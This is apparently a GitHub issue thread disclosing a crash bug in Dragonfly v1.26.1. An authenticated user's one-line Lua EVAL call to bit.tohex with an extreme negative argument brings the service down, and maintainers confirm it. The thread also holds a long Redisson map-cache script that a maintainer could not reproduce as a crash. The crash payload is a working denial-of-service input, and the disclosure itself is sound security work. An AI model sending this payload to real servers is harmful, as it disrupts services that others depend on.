Lua library commands can cause the Dragonfly service to crash

[ankki-zsyang]

Summary

Authenticated users can construct special Lua library commands that cause the dragonfly service to crash.

Details

Dragonfly version: df-v1.26.1
Payload:
EVAL "return bit.tohex(65535, -2147483648)" 0
Executing the above payload will cause the dragonfly service to crash immediately.
Poof:

Reporter

The problem was reported by ankki-zsyang, Shenzhen Ankki Technologies Co.Ltd.

[kostasrim]

Hi @ankki-zsyang, indeed we crash. We will take a look and get back to you

[uttomroy]

in my machine I am also getting similar issue for different command. My machine is mac m3. I am not sure it is specific to mac or not.

[romange]

can you please paste the full command that reproduces the failure here, @uttomroy ?

[uttomroy]

"EVAL" "if redis.call('setnx', KEYS[6], ARGV[4]) == 0 then return -1;end;redis.call('expire', KEYS[6], ARGV[3]); local expiredKeys1 = redis.call('zrangebyscore', KEYS[2], 0, ARGV[1], 'limit', 0, ARGV[2]); for i, key in ipairs(expiredKeys1) do local v = redis.call('hget', KEYS[1], key); if v ~= false then local t, val = struct.unpack('dLc0', v); local msg = struct.pack('Lc0Lc0', string.len(key), key, string.len(val), val); local listeners = redis.call(ARGV[5], KEYS[4], msg); if (listeners == 0) then break;end; end;end;for i=1, #expiredKeys1, 5000 do redis.call('zrem', KEYS[5], unpack(expiredKeys1, i, math.min(i+4999, table.getn(expiredKeys1)))); redis.call('zrem', KEYS[3], unpack(expiredKeys1, i, math.min(i+4999, table.getn(expiredKeys1)))); redis.call('zrem', KEYS[2], unpack(expiredKeys1, i, math.min(i+4999, table.getn(expiredKeys1)))); redis.call('hdel', KEYS[1], unpack(expiredKeys1, i, math.min(i+4999, table.getn(expiredKeys1)))); end; local expiredKeys2 = redis.call('zrangebyscore', KEYS[3], 0, ARGV[1], 'limit', 0, ARGV[2]); for i, key in ipairs(expiredKeys2) do local v = redis.call('hget', KEYS[1], key); if v ~= false then local t, val = struct.unpack('dLc0', v); local msg = struct.pack('Lc0Lc0', string.len(key), key, string.len(val), val); local listeners = redis.call(ARGV[5], KEYS[4], msg); if (listeners == 0) then break;end; end;end;for i=1, #expiredKeys2, 5000 do redis.call('zrem', KEYS[5], unpack(expiredKeys2, i, math.min(i+4999, table.getn(expiredKeys2)))); redis.call('zrem', KEYS[3], unpack(expiredKeys2, i, math.min(i+4999, table.getn(expiredKeys2)))); redis.call('zrem', KEYS[2], unpack(expiredKeys2, i, math.min(i+4999, table.getn(expiredKeys2)))); redis.call('hdel', KEYS[1], unpack(expiredKeys2, i, math.min(i+4999, table.getn(expiredKeys2)))); end; return #expiredKeys1 + #expiredKeys2;" "6" "suppressionMapCache" "redisson__timeout__set:{suppressionMapCache}" "redisson__idle__set:{suppressionMapCache}" "redisson_map_cache_expired:{suppressionMapCache}" "redisson__map_cache__last_access__set:{suppressionMapCache}" "redisson__execute_task_once_latch:{suppressionMapCache}" "1737463077167" "100" "5" "1" "PUBLISH"

[uttomroy]

the same command works for other machine.

[uttomroy]

@romange

[romange]

Thank you very much, we will follow up on this. 🙏🏼

[romange]

@uttomroy I can not reproduce the failure on my machine. This is what I do:

docker run -p 6379:6379  docker.dragonflydb.io/dragonflydb/dragonfly:v1.26.1

and then run the command you posted. I get "0" in the result.